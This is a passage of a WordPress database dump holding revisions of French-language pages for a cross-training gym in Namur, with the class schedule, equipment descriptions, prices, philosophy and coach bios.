(331, 1, '2013-07-10 15:45:29', '2013-07-10 15:45:29', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-10 15:45:29', '2013-07-10 15:45:29', '', 11, 'http://www.crosstrainingcenter.be/11-revision-111/', 0, 'revision', '', 0),
(332, 1, '2013-07-25 16:33:42', '2013-07-25 16:33:42', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-25 16:33:42', '2013-07-25 16:33:42', '', 11, 'http://www.crosstrainingcenter.be/11-revision-112/', 0, 'revision', '', 0),
(333, 1, '2013-07-25 16:34:48', '2013-07-25 16:34:48', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-25 16:34:48', '2013-07-25 16:34:48', '', 11, 'http://www.crosstrainingcenter.be/11-revision-113/', 0, 'revision', '', 0),
(334, 1, '2013-07-25 16:30:38', '2013-07-25 16:30:38', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebell</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-07-25 16:30:38', '2013-07-25 16:30:38', '', 22, 'http://www.crosstrainingcenter.be/22-revision-31/', 0, 'revision', '', 0),
(335, 1, '2013-07-04 19:25:18', '2013-07-04 19:25:18', '<blockquote>\r\n<h2>Bien plus qu\'une simple activité physique, le cross training center de Namur vous propose une approche unique faisant intervenir l\'alimentation et la gestion du stress, tout en vous proposant un entraînement de qualité.</h2>\r\n&nbsp;</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:25:18', '2013-07-04 19:25:18', '', 5, 'http://www.crosstrainingcenter.be/5-revision-61/', 0, 'revision', '', 0),
(336, 1, '2013-07-10 15:47:02', '2013-07-10 15:47:02', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 